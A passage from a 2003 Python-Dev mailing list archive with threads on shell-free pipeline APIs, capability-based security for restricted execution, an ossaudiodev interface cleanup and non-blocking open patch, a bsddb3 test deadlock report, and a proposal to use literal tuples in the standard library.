platforms, not in parsing the sh-like syntax.  Then again, Tcl was trying to
run all the way back to Windows 3.1, and Python already gave up on that.


From oren-py-d@hishome.net  Tue Mar 11 01:19:20 2003
From: oren-py-d@hishome.net (Oren Tirosh)
Date: Mon, 10 Mar 2003 20:19:20 -0500
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <200303092252.h29Mqdk17019@oma.cosc.canterbury.ac.nz>
References: <BIEJKCLHCIOIHAGOKOLHAEMGFBAA.tim.one@comcast.net> <200303092252.h29Mqdk17019@oma.cosc.canterbury.ac.nz>
Message-ID: <20030311011920.GA41330@hishome.net>

On Mon, Mar 10, 2003 at 11:52:39AM +1300, Greg Ewing wrote:
> > Those would be quite different functions, then, unless you proposed to have
> > Python interpret native shell metacharacters on its own too (e.g., set up
> > pipes, do the indicated file redirections, interpolate envars, and fake
> > whatever other shell gimmicks people may use).
> 
> What we need is a function which does all those things,
> but uses some way of specifying them *other* than shell
> metacharacters. E.g.
> 
>   os.plumb(("sed", "-e", "s/dead/resting/", "parrots"), 
>     ("grep", "norwegian"), output = myfile))

How about this:

cmd.sed('-e', 's/dead/resting', 'parrots') / cmd.grep('norwegian') >> myfile

or this:

def mygrep(pattern):

    def tran(upstream):
        for s in upstream:
             if re.search(pattern, s):
                 yield s

    return transformation(tran)

open('parrots') / (lambda s:s.replace('dead','resting')) / mygrep('norwegian')) >> open('myfile', 'w')


This is not some hypothetical syntax - I have a module that actually 
does this. It can mix python functions, generators and external commands 
in the same flow, use any iterable object as source, use a file, list 
or other data consumer as destination and a few more goodies.

It's not finished but it mostly works. I don't have much time to 
work on it, though.

oh-dear-what-have-I-done-now-I'll-have-to-finish-it-ly yours,

    Oren


From Anthony Baxter <anthony@interlink.com.au>  Tue Mar 11 02:07:01 2003
From: Anthony Baxter <anthony@interlink.com.au> (Anthony Baxter)
Date: Tue, 11 Mar 2003 13:07:01 +1100
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <200303101540.h2AFeW012107@odiug.zope.com>
Message-ID: <200303110207.h2B272e30128@localhost.localdomain>

>>> Guido van Rossum wrote
>  The only truly secure
> object is None. :-)

You sure?

>>> None.__class__.__class__.mro(type(None))[1]
<type 'object'>

Not sure what else it's possible to get to from None...

Anthony
-- 
Anthony Baxter     <anthony@interlink.com.au>   
It's never too late to have a happy childhood.


From mwh@python.net  Tue Mar 11 10:29:45 2003
From: mwh@python.net (Michael Hudson)
Date: Tue, 11 Mar 2003 10:29:45 +0000
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEBIEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Mon, 10 Mar 2003 19:41:42 -0500")
References: <LNBBLJKPBEHFEDALKOLCAEBIEAAB.tim.one@comcast.net>
Message-ID: <2mfzpufb6u.fsf@starship.python.net>

Tim Peters <tim.one@comcast.net> writes:

> [Greg Ewing]
>> What we need is a function which does all those things,
>> but uses some way of specifying them *other* than shell
>> metacharacters. E.g.
>>
>>   os.plumb(("sed", "-e", "s/dead/resting/", "parrots"),
>>     ("grep", "norwegian"), output = myfile))
>
> [Jeff Epler]
>> +1 on the concept.  +1 on something that can be transformed to use tcl's
>> "exec" so that it'll begin working on several common arches immediately.
>
> They're really the same thing -- Tcl's exec would be a simple transformation
> of a cross-platform sh-like syntax into Greg's hypothesized functions.

I think Jeff was suggesting that we implement it like this:

def plumb(cmd):
    import Tkinter
    return Tkinter.call('exec ' + cmd)

or whatever.

Cheers,
M.

-- 
  at any rate, I'm satisfied that not only do they know which end of
  the pointy thing to hold, but where to poke it for maximum effect.
                                  -- Eric The Read, asr, on google.com


From gward@python.net  Tue Mar 11 14:15:59 2003
From: gward@python.net (Greg Ward)
Date: Tue, 11 Mar 2003 09:15:59 -0500
Subject: [Python-Dev] Audio devices
Message-ID: <20030311141559.GA15139@cthulhu.gerg.ca>

Back at work on the ossaudiodev docs for a few minutes.  Documenting an
API is always a great opportunity to clean it up, and the
ossaudiodev.open() function has a weird interface right now.  From the
current docs:

"""
open([device, ] mode)
    Open an audio device and return an OSS audio device object. This
    object supports many file-like methods, such as read(), write(), and
    fileno() (although there are subtle differences between conventional
    Unix read/write semantics and those of OSS audio devices). It also
    supports a number of audio-specific methods; see below for the
    complete list of methods.

    Note the unusual calling syntax: the first argument is optional, and
    the second is required. This is a historical artifact for
    compatibility with the older linuxaudiodev module which ossaudiodev
    supersedes.

    device is the audio device filename to use. If it is not specified,
    this module first looks in the environment variable AUDIODEV for a
    device to use. If not found, it falls back to /dev/dsp.

    mode is one of 'r' for read-only (record) access, 'w' for write-only
    (playback) access and 'rw' for both. Since many soundcards only
    allow one process to have the recorder or player open at a time it
    is a good idea to open the device only for the activity
    needed. Further, some soundcards are half-duplex: they can be opened
    for reading or writing, but not both at once.
"""

The historical background is that in linuxaudiodev prior to Python 2.3,
it was *impossible* to specify the device file to open -- you had to do
something like this:

  os.environ['AUDIODEV'] = "/dev/dsp2"
  dsp = linuxaudiodev.open("w")

Fixing that wart is what led me to create ossaudiodev in the first
place.  Cleaning up the remaining ugliness in ossaudiodev.open() brings
things nicely full-circle.  Anyways, since the module has been renamed,
who cares about backwards compatibility with linuxaudiodev?  I'd like to
change the open() interface to:

  open(device, mode)

where both are required.  (Most use of the audio device is for playback,
not recording.  But a default mode of "w" goes counter to expectations.
So I think 'mode' should be required.)

This would also mean getting rid of the $AUDIODEV check in
ossaudiodev.c.  Less C code is a good thing, unless of course it leads
to lots of redundant Python code all over the world.

Finally, for consistency I should also change openmixer() to require a
'device' argument (currently, it does the same thing, but hardcodes
"/dev/mixer" and checks $MIXERDEVICE).

Of course, this will lead people to hardcode "/dev/dsp" (and/or
"/dev/mixer") into their Python audio scripts.  That's bad if other
OSS-using operating systems have different names for the standard audio
devices.  Do they?

But it's certainly no *worse* than the situation for C programmers, who
have to assume "/dev/dsp" as a default -- the open(2) system call
certainly doesn't let you get away with leaving the filename out.  And
besides, "/dev/dsp" is already hard-coded into ossaudiodev.c, so if
that's inappropriate on certain operating systems, somebody's going to
lose already. 

Thoughts?

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
Sure, I'm paranoid... but am I paranoid ENOUGH?


From guido@python.org  Tue Mar 11 14:54:00 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 11 Mar 2003 09:54:00 -0500
Subject: [Python-Dev] Audio devices
In-Reply-To: Your message of "Tue, 11 Mar 2003 09:15:59 EST."
 <20030311141559.GA15139@cthulhu.gerg.ca>
References: <20030311141559.GA15139@cthulhu.gerg.ca>
Message-ID: <200303111454.h2BEs1B23261@odiug.zope.com>

> Back at work on the ossaudiodev docs for a few minutes.

Great!  I wonder if you have any thoughts on why running
test_ossaudiodev hangs when run on Linux Red Hat 7.3?  I'm currently
using a 2.4.18-24.7.x kernel.  I have no idea what other info would be
useful to debug this.

Regarding the changes you propose, I was going to vote +1 on all, but
I realize I'm not a user so my vote should only count as epsilon.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gward@python.net  Tue Mar 11 15:58:41 2003
From: gward@python.net (Greg Ward)
Date: Tue, 11 Mar 2003 10:58:41 -0500
Subject: [Python-Dev] Audio devices
In-Reply-To: <200303111454.h2BEs1B23261@odiug.zope.com>
References: <20030311141559.GA15139@cthulhu.gerg.ca> <200303111454.h2BEs1B23261@odiug.zope.com>
Message-ID: <20030311155841.GB14963@cthulhu.gerg.ca>

On 11 March 2003, Guido van Rossum said:
> Great!  I wonder if you have any thoughts on why running
> test_ossaudiodev hangs when run on Linux Red Hat 7.3?  I'm currently
> using a 2.4.18-24.7.x kernel.  I have no idea what other info would be
> useful to debug this.

The most obvious cause is that some other process has the audio device
open, and your audio {hardware, device driver} only allows one at a
time.

If you're running one of those newfangled GUI environments like KDE or
GNOME, it's quite likely that the esound or aRTSd (however you spell it)
daemon started when you logged in, and is thus blocking all access to
your /dev/dsp.  This sucks, but IMHO it's not ossaudiodev's job to know
about esound and similar.

One way to test this is to take your system down to single-user (or at
least a console-only, no-X11 runlevel) and then try running
test_ossaudiodev.

Hmmm, it looks like calling open() with O_NONBLOCK helps.  I know this
does *not* affect later read()/write() -- there's a special ioctl() for
non-blocking read/write -- but it *does* appear to fix blocking open().
At least for me it turned a second open() attempt on the same device
from "hang" to "IOError: [Errno 16] Device or resource busy:
'/dev/dsp2'".

Try this patch; if it works I'll check it in:

--- Modules/ossaudiodev.c       10 Mar 2003 03:17:06 -0000      1.24
+++ Modules/ossaudiodev.c       11 Mar 2003 15:56:24 -0000
@@ -131,7 +131,7 @@
           basedev = "/dev/dsp";
     }
 
-    if ((fd = open(basedev, imode)) == -1) {
+    if ((fd = open(basedev, imode|O_NONBLOCK)) == -1) {
         PyErr_SetFromErrnoWithFilename(PyExc_IOError, basedev);
         return NULL;
     }

test_ossaudiodev.py will still need fixing to handle the EBUSY error,
but at least this should prevent hanging on open().

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
Hand me a pair of leather pants and a CASIO keyboard -- I'm living for today!


From guido@python.org  Tue Mar 11 16:04:54 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 11 Mar 2003 11:04:54 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Your message of "Mon, 10 Mar 2003 16:15:18 EST."
 <E18sUcB-0003SH-00@localhost>
References: <E18s06J-0006ZD-00@localhost> <200303100110.h2A1AaC06743@pcp02138704pcs.reston01.va.comcast.net>
 <E18sUcB-0003SH-00@localhost>
Message-ID: <200303111605.h2BG4wA24117@odiug.zope.com>

(Zooko, would it kill you to keep your line lengths well below 79?)

[Zooko]
> > > The [Principle-of-Least-Privilege approach to securing a
> > > standard library] is to separate the tools so that dangerous
> > > ones don't come tied together with common ones.  The security
> > > policy, then, is expressed by code that grants or withholds
> > > capabilities (== references) rather than by code that toggles
> > > the "restricted" bit.

[Guido]
> > This sounds interesting, but I'm not sure I follow it.  Can you
> > elaborate by giving a couple of examples?

[Zooko]
> First let me say that "capability access control" [1] is a
> theoretical construct, comparable to "access control lists" [2] and
> "Trust Management" [3].  Each is a formal model for specifying
> access control rules -- who is allowed to do what.
> 
> But in the context of Python we are interested not only in the
> theoretical model but also in a specific way of implementing it --
> by making object references unforgeable and binding all authorities
> to object references.
> 
> So in this discussion it may not be clear whether a claimed
> advantage of "capabilities" flows from the formal model or from the
> practice of unifying security programming with object oriented
> programming.  I don't think it is important to differentiate in this
> discussion.
> 
> Now for examples...
> 
> Hm, well first of all, where are rexec and Zope proxies currently
> used?  I believe that a "cap-Python" would support those uses,
> implementing the same security policies, but more cleanly since
> access control would be a first-class part of the language.
> 
> I don't know Zope very well, and rather than guess, I'd like to ask
> someone who does know Zope to give a typical example of how proxies
> are used in workaday Zope.  I suspect that capabilities are quite
> similar to Zope proxies.

Yes.

> Now for a quick made-up example to demonstrate what I meant about
> expressing security policy above, consider a tic-tac-toe game that
> is supposed to draw to the screen.
> 
> In "restricted Python v1", certain modules have been flagged as
> "safe" and others "unsafe".  Code can execute other code with a
> "restricted" flag set, something like this:
> 
> # restricted Python v1
> game = eval(TicTacToeGame, restricted=True)
> game.display()
> 
> Unfortunately, in "restricted Python v1", all of the modules that
> allow drawing to the screen are marked as "unsafe", so the
> tic-tac-toe-game immediately dies with an exception.
> 
> In "restricted Python v2", an arbitrary security policy can be implemented:
> 
> # restricted Python v2
> games=[]
> def securitypolicy(subject, action, object):
>     if ((subject in games) and (action == "import") and (object == "wxPython")) or
>         (subject in games) and (action == "execute") and (object == "wxPython.Window") or
>         (subject in games) and (action == "execute") and (object == "wxPython.Window.paint")):
>         return True
>     # ...
>     return False
> 
> game = eval(TicTacToeGame, policy=securitypolicy)
> gameobjh.append(game)
> game.display()
> 
> I think that the "rexec" design was along the lines of "restricted
> Python v2", but I apologize if this simple analogy insults anyone.

Not really.  The rexec design gives you the tools to implement either
v1, v2 or v3.  Its basic features are more like v1, but it has a
concept of Zope-like proxies, named Bastions, and it allows you to use
functions or bound methods as capabilities.  Bastions are mostly a
convenience to allow a bunch of capabilities to be used like an
object.  The "security policy" you sketch as part of v2 would be
possible but there aren't really any hooks to implement this; you'd
have to craft it out of Bastions and capabilities.

> I'm not sure whether "restricted Python v2" is expressive enough to
> implement the capability security access control model or not, but I
> don't care, because I don't like "restricted Python v2".  I like
> restricted Python v3:
> 
> # restricted Python v3
> game = TicTacToeGame()
> game.display(wxPython.wxWindow())
> 
> Now the game object has a reference to the window object, and it can
> use that reference to draw the pictures.  If I later change this
> design and decide that instead of drawing to a window, I want the
> game to write to a file, then I'll change the implementation of the
> TicTacToeGame class, and then'll I'll come back here to this code
> and change it from passing a wxWindows to:
> 
> # restricted Python v3
> game = TicTacToeGame()
> game.display(open("/tmp/tttgame.out","w"))
> 
> Now if I were writing in "restricted Python v2", then in addition to
> those two changes I would also have to make a third change, which is
> to edit my securitypolicy function in order to allow this particular
> game object to access a file named "/tmp/tttgame.out", and to
> disallow it access to wxPython:
> 
> # restricted Python v2
> def securitypolicy(subject, action, object):
>     if (subject in games) and (action in ("read", "write",)) and (object == "file:/tmp/tttgame.out"):
>         return True
>     # ...
>     return False
> 
> game = TicTacToeGame()
> game.display("/tmp/tttgame.out")
> 
> This is what I meant by saying that the security policy is expressed
> in Python instead of by twiddling access bits in an embedded policy
> language.  In a capability-secure language, the change (which the
> programmer has to make anyway), from "wxPython.wxWindows()" to
> "open('/tmp/tttgame.out', 'w')" is necessary and sufficient to
> enforce the programmer's intended security policy, so there is no
> need for the redundant and brittle "policy" function.
> 
> I find this unification access control and application logic to
> resonate deeply with the Zen of Python.

Me too.

> Regards,
> 
> Zooko
> 
> [1] http://www.eros-os.org/papers/shap-thesis.ps
> [2] http://www.research.microsoft.com/~lampson/09-Protection/Acrobat.pdf
> [3] http://citeseer.nj.nec.com/blaze96decentralized.html

--Guido van Rossum (home page: http://www.python.org/~guido/)


From ark@gmx.net  Tue Mar 11 15:12:41 2003
From: ark@gmx.net (Arne Koewing)
Date: Tue, 11 Mar 2003 16:12:41 +0100
Subject: [Python-Dev] Re: Audio devices
References: <20030311141559.GA15139@cthulhu.gerg.ca>
Message-ID: <87zno2ym1i.fsf@gmx.net>

Greg Ward <gward@python.net> writes:

> Of course, this will lead people to hardcode "/dev/dsp" (and/or
> "/dev/mixer") into their Python audio scripts.  That's bad if other
> OSS-using operating systems have different names for the standard audio
> devices.  Do they?

with devfs (Linux) this would be /dev/sound/dsp and /dev/sound/mixer
(but there are compatibility links...)


From guido@python.org  Tue Mar 11 16:20:18 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 11 Mar 2003 11:20:18 -0500
Subject: [Python-Dev] Audio devices
In-Reply-To: Your message of "Tue, 11 Mar 2003 10:58:41 EST."
 <20030311155841.GB14963@cthulhu.gerg.ca>
References: <20030311141559.GA15139@cthulhu.gerg.ca> <200303111454.h2BEs1B23261@odiug.zope.com>
 <20030311155841.GB14963@cthulhu.gerg.ca>
Message-ID: <200303111620.h2BGKJn27187@odiug.zope.com>

> On 11 March 2003, Guido van Rossum said:
> > Great!  I wonder if you have any thoughts on why running
> > test_ossaudiodev hangs when run on Linux Red Hat 7.3?  I'm currently
> > using a 2.4.18-24.7.x kernel.  I have no idea what other info would be
> > useful to debug this.

[Greg]
> The most obvious cause is that some other process has the audio device
> open, and your audio {hardware, device driver} only allows one at a
> time.

Hm, but I *do* hear some sound coming out of the speaker: a quiet,
sped-up squeaky version of the "nobody expects the spanish
inquisition" soundclip that test_linuxaudiodev also used to play.
(The latter now crashes for me with "linuxaudiodev.error: (0,
'Error')".)

> If you're running one of those newfangled GUI environments like KDE or
> GNOME, it's quite likely that the esound or aRTSd (however you spell it)
> daemon started when you logged in, and is thus blocking all access to
> your /dev/dsp.  This sucks, but IMHO it's not ossaudiodev's job to know
> about esound and similar.
> 
> One way to test this is to take your system down to single-user (or at
> least a console-only, no-X11 runlevel) and then try running
> test_ossaudiodev.

I tried this at runlevel 1, and the symptoms are identical: some
squeaks, then it hangs.

> Hmmm, it looks like calling open() with O_NONBLOCK helps.  I know this
> does *not* affect later read()/write() -- there's a special ioctl() for
> non-blocking read/write -- but it *does* appear to fix blocking open().
> At least for me it turned a second open() attempt on the same device
> from "hang" to "IOError: [Errno 16] Device or resource busy:
> '/dev/dsp2'".
> 
> Try this patch; if it works I'll check it in:
> 
> --- Modules/ossaudiodev.c       10 Mar 2003 03:17:06 -0000      1.24
> +++ Modules/ossaudiodev.c       11 Mar 2003 15:56:24 -0000
> @@ -131,7 +131,7 @@
>            basedev = "/dev/dsp";
>      }
>  
> -    if ((fd = open(basedev, imode)) == -1) {
> +    if ((fd = open(basedev, imode|O_NONBLOCK)) == -1) {
>          PyErr_SetFromErrnoWithFilename(PyExc_IOError, basedev);
>          return NULL;
>      }
> 
> test_ossaudiodev.py will still need fixing to handle the EBUSY error,
> but at least this should prevent hanging on open().

Yes, it fixes the hang.  Please check it in!

The sample is still played at too high a speed, but maybe that's
expected?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Tue Mar 11 16:33:51 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 11 Mar 2003 11:33:51 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Your message of "Tue, 11 Mar 2003 09:59:59 +1300."
 <200303102059.h2AKxxR24396@oma.cosc.canterbury.ac.nz>
References: <200303102059.h2AKxxR24396@oma.cosc.canterbury.ac.nz>
Message-ID: <200303111633.h2BGXum27649@odiug.zope.com>

[Greg Ewing]
> I think I agree that to really get on top of this security business we
> need to move towards having dangerous things forbidden by default
> rather than allowed by default.

This is more or less what the rexec module implements, except for
convenience it has a list of unsafe built-ins rather than a list of
safe built-in.

> To that end, it would be useful if we could pin down exactly what's
> dangerous and what isn't.  It seems to me that most uses of
> introspection by most programs are harmless. Can we sort out those
> (hopefully few) things that are dangerous, and separate them from the
> existing introspection mechanisms?

Maybe, maybe not.  The original restricted execution code (not the
rexec module) arbitrarily decided that setting class attributes was
dangerous but getting them was not.  Samuele found that new-style
classes allow both, but always disallows write-access to the class
__dict__ (you have to use the setattr protocol); this is good or bad
depending on how it's used.

The real problem is that harmful access may be granted via
innocent-looking access.  For example, allowing read-only access to a
function's globals gives you access to the unrestricted 'open'
function...

> Access to sys.modules has been mentioned as a key thing that needs to
> be restricted. Maybe this shouldn't be an arbitrarily-accessible
> variable?  Maybe the sys module shouldn't be a module at all, but some
> special object that won't let you do nasty things with its contents
> unless you've got special privileges (which most code would *not*
> have by default). 

That's pretty much what the rexec module implements; it overrides
__import__ and when you ask for sys, you get a fake sys that only
contains stuff that should be safe.

> One of the "nasty" things would be picking the real __builtins__ out
> of sys.modules. Are there any others?

Picking an unsafe extension module out of sys.modules.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From pedronis@bluewin.ch  Tue Mar 11 17:02:36 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Tue, 11 Mar 2003 18:02:36 +0100
Subject: [Python-Dev] Capabilities
References: <200303102059.h2AKxxR24396@oma.cosc.canterbury.ac.nz>  <200303111633.h2BGXum27649@odiug.zope.com>
Message-ID: <054701c2e7f0$0435d7c0$6d94fea9@newmexico>

From: "Guido van Rossum" <guido@python.org>
> [Greg Ewing]
> > I think I agree that to really get on top of this security business we
> > need to move towards having dangerous things forbidden by default
> > rather than allowed by default.
>
> This is more or less what the rexec module implements, except for
> convenience it has a list of unsafe built-ins rather than a list of
> safe built-in.
>
> > To that end, it would be useful if we could pin down exactly what's
> > dangerous and what isn't.  It seems to me that most uses of
> > introspection by most programs are harmless. Can we sort out those
> > (hopefully few) things that are dangerous, and separate them from the
> > existing introspection mechanisms?
>
> Maybe, maybe not.  The original restricted execution code (not the
> rexec module) arbitrarily decided that setting class attributes was
> dangerous but getting them was not.  Samuele found that new-style
> classes allow both, but always disallows write-access to the class
> __dict__ (you have to use the setattr protocol); this is good or bad
> depending on how it's used.

but given that methods can be overriden per instance with classic-classes:

class C:
  def f(s):
    ...

c=C()
c.f = lambda s: s

it was not so effective.

> The real problem is that harmful access may be granted via
> innocent-looking access.  For example, allowing read-only access to a
> function's globals gives you access to the unrestricted 'open'
> function...

restricted execution alone for example does not have a notion of subclassable
vs. non subclassable classes,
and given its approach, subclassing can be dangerous.

For sure a good thing would be for func_* and im_* attributes of functions and
methods to be substituted by special accessor functions/objects, indipendently
of restricted mode.

Function and method should be for normal code basically opaque.


From ping@zesty.ca  Tue Mar 11 17:24:13 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Tue, 11 Mar 2003 11:24:13 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <3E6CB1D8.4050108@zope.com>
Message-ID: <Pine.LNX.4.33.0303111113480.26020-100000@server1.lfw.org>

On Mon, 10 Mar 2003, Jim Fulton wrote:
> Ka-Ping Yee wrote:
> > Here's a preliminary description of the boundary between "introspective"
> > and "restricted", off the top of my head:
> >
> >     1.  The only thing you can do with a bound method is to call it
> >         (bound methods have no attributes except __doc__).
>
> Well, I see no harm and much usefulness
> in allowing __name__, __repr__, and __str__.

Depends.  In a truly secure system, classes would only reveal
information about themselves if they wanted to.  The default
__repr__ gives away to the id() of the instance, and __name__
gives away the name of the method, which would prevent you
from creating proxies that are indistinguishable from the
original.  Sometimes it is useful to be able to do that.

> >     2.  The following instance attributes are off limits:
> >         __class__, __dict__, __module__.
>
> I generally want to be able to get the __class__. This is harmless
> in my case, because I get a proxy back.

We definitely do not want to provide access to __class__.
Access to an instance should not give you the power to create
more instances of its class.  If you passed somebody a file
object, access to the class would convey the power to open any
file on the filesystem!

> > However, there is still the problem that the established technique
> > for storing instance-specific state in Python is to use globally-
> > accessible data attributes instead of a limited scope.  We would
> > also need to add a safe (private) place for instances to put state.
>
> I'm don't understand why this is necessary. In general, you want to
> restrict what attributes (data, properties, methods, etc.) are accessible
> in certain situations. I don't follow what makes data attributes special.

Instances currently don't have a private place to put their state,
and unless there is a convenient way do that, implementers will
tend to expose their instance state in public data attributes.

Even if the instance had properties, the properties still (as yet)
have no way to conveniently distinguish if access is being attempted
from within an instance method, or from outside the instance.


-- ?!ng


From ping@zesty.ca  Tue Mar 11 17:28:59 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Tue, 11 Mar 2003 11:28:59 -0600 (CST)
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <200303101540.h2AFeW012107@odiug.zope.com>
Message-ID: <Pine.LNX.4.33.0303111124220.26020-100000@server1.lfw.org>

On Mon, 10 Mar 2003, Guido van Rossum wrote:
> [Ping]
> > By the way -- to avoid confusion between "proxies used to wrap
> > unrestricted objects in order to make them into secure objects" and
> > "proxies used to reduce the interface of an existing secure object",
> > let's call the first "proxy" (as has been used in the "rexec vs. proxy"
> > discussion so far), and call the second a "facet" (which is the term
> > commonly used when capabilities people talk about reducing an interface).
>
> Hm, I'm not sure I understand the difference between the two
> definitions you give.  What does "making something into a secure
> object" mean if not "reducing its interface"?  And what is the
> fundamental difference between a secure object and an insecure one?
> In my world view there's a gradual difference.

I acknowledge that it's not perfectly black and white, but what
i meant in the above is that a "secure object" is one that exposes
only its declared interface.

The key difference i'm getting at is whether the interface is the
one intended by the programmer.  Proxies are for ensuring that
the interface doesn't leak things the programmer never intended;
facets are for the programmer to intentionally reduce the interface
of an already secure object to limit its powers.

Er, perhaps another way of saying it is that proxies are at the
system level and facets are at the user level.


-- ?!ng


From pedronis@bluewin.ch  Tue Mar 11 17:30:27 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Tue, 11 Mar 2003 18:30:27 +0100
Subject: [Python-Dev] Capabilities
References: <200303102059.h2AKxxR24396@oma.cosc.canterbury.ac.nz>  <200303111633.h2BGXum27649@odiug.zope.com> <054701c2e7f0$0435d7c0$6d94fea9@newmexico>
Message-ID: <062d01c2e7f3$e82b0d80$6d94fea9@newmexico>

From: "Samuele Pedroni" <pedronis@bluewin.ch>
> For sure a good thing would be for func_* and im_* attributes of functions
and
> methods to be substituted by special accessor functions/objects,
indipendently
> of restricted mode.

to clarify:

I mean something like

func_globals(f)

vs

f.func_globals

regards


From ben@algroup.co.uk  Tue Mar 11 17:50:38 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Tue, 11 Mar 2003 17:50:38 +0000
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303101538.h2AFcTR12087@odiug.zope.com>
References: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org> <200303101538.h2AFcTR12087@odiug.zope.com>
Message-ID: <3E6E21EE.50709@algroup.co.uk>

Guido van Rossum wrote:
>>Ben Laurie wrote:
>>There seems to be a persistent confusion here that i would like
>>to dispel: a capability is not a single lambda.
> 
> 
> I guess, I misunderstood..  I was sure that Ben told me this was so.
> Apparently I misread, or you have a different definition of capability
> than he does (wouldn't be the first time.)

The thing is that a capability is a pretty abstract notion. You can 
implement them as classes or as lambdas - I initially did them as 
classes, but decided that lambdas were neater, at least in the context 
of Python. I could be wrong. It could just be my particular bias, which 
is why I'd prefer, ideally, to be able to do either.

I'm sure if people want to be definition lawyers they can find 
documentation explaining why either of those isn't quite right, but I'm 
interested in functionality and the functionality is available either way.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From greg@cosc.canterbury.ac.nz  Tue Mar 11 21:08:44 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 12 Mar 2003 10:08:44 +1300 (NZDT)
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <2mfzpufb6u.fsf@starship.python.net>
Message-ID: <200303112108.h2BL8ii29619@oma.cosc.canterbury.ac.nz>

> I think Jeff was suggesting that we implement it like this:
> 
> def plumb(cmd):
>     import Tkinter
>     return Tkinter.call('exec ' + cmd)

But then you'd be going through the bottleneck of a
string syntax with all its attendant quoting problems.
The whole point of my suggestion was to avoid that!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From gward@python.net  Tue Mar 11 21:44:50 2003
From: gward@python.net (Greg Ward)
Date: Tue, 11 Mar 2003 16:44:50 -0500
Subject: [Python-Dev] Audio devices
In-Reply-To: <200303111620.h2BGKJn27187@odiug.zope.com>
References: <20030311141559.GA15139@cthulhu.gerg.ca> <200303111454.h2BEs1B23261@odiug.zope.com> <20030311155841.GB14963@cthulhu.gerg.ca> <200303111620.h2BGKJn27187@odiug.zope.com>
Message-ID: <20030311214450.GA16297@cthulhu.gerg.ca>

On 11 March 2003, Guido van Rossum said:
> Yes, it fixes the hang.  Please check it in!

OK, done.

> The sample is still played at too high a speed, but maybe that's
> expected?

No, definitely not.  On my system, it sounds the same as it has with
linuxaudiodev for quite a while, and the same as it did with sunaudiodev
on my old Sun box at CNRI before that.

*Maybe* there's something wrong with how setparameters() initializes the
audio device.  Try this patch and see how it goes:

--- Lib/test/test_ossaudiodev.py        14 Feb 2003 19:29:22 -0000      1.4
+++ Lib/test/test_ossaudiodev.py        11 Mar 2003 21:42:31 -0000
@@ -52,8 +52,10 @@
     a.fileno()
 
     # set parameters based on .au file headers
-    a.setparameters(rate, 16, nchannels, fmt)
-    a.write(data)
+    a.setfmt(fmt)
+    a.channels(nchannels)
+    a.speed(rate)
+    a.writeall(data)
     a.flush()
     a.close()
 

Hmmm, I just noticed that setting O_NONBLOCK at open() time *does* have
an effect -- I needed to change that write() to writeall() in order to
hear the whole test sound.  Uh-oh.

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
"... but in the town it was well known that when they got home their fat and
psychopathic wives would thrash them to within inches of their lives ..."


From skip@pobox.com  Tue Mar 11 22:20:07 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 11 Mar 2003 16:20:07 -0600
Subject: [Python-Dev] bsddb3 test errors - are these expected?
Message-ID: <15982.24855.181016.568236@montanaro.dyndns.org>

I just tried running regrtest with "-uall,-largefile" (after a "cvs up",
"./config.status --recheck", and "make") on my Mac OS X system.  It chugged
for awhile, then spit this out several times:

    Exception in thread reader 4:
    Traceback (most recent call last):
      File "/Users/skip/src/python/head/dist/src/Lib/threading.py", line 411, in __bootstrap
        self.run()
      File "/Users/skip/src/python/head/dist/src/Lib/threading.py", line 399, in run
        self.__target(*self.__args, **self.__kwargs)
      File "/Users/skip/src/python/head/dist/src/Lib/bsddb/test/test_thread.py", line 270, in reade
    rThread
        rec = c.first()
    DBLockDeadlockError: (-30995, 'DB_LOCK_DEADLOCK: Locker killed to resolve a deadlock')

once for each thread, then this:

    /Users/skip/src/python/head/dist/src/Lib/bsddb/dbutils.py:67: RuntimeWarning: DB_INCOMPLETE: Ca
    che flush was unable to complete
      return function(*_args, **_kwargs)

After chugging awhile longer, it segfaulted.

What (if anything) can I do to provide useful inputs to someone who can
possibly fix the problem?

Skip


From fincher.8@osu.edu  Tue Mar 11 19:49:42 2003
From: fincher.8@osu.edu (Jeremy Fincher)
Date: Tue, 11 Mar 2003 14:49:42 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <15982.24855.181016.568236@montanaro.dyndns.org>
References: <15982.24855.181016.568236@montanaro.dyndns.org>
Message-ID: <200303111449.42035.fincher.8@osu.edu>

There are many places in the standard library where some code either iterates 
over a literal list or checks for membership in a literal list.  I'm curious 
if it would be considered productive and useful to go through and change 
those places to iterate over/check for membership in literal tuples instead 
fo lists.  The tuple, I think, more closely reflects the read-only literal 
nature of the code and is slightly faster to boot.  (Not that the speed 
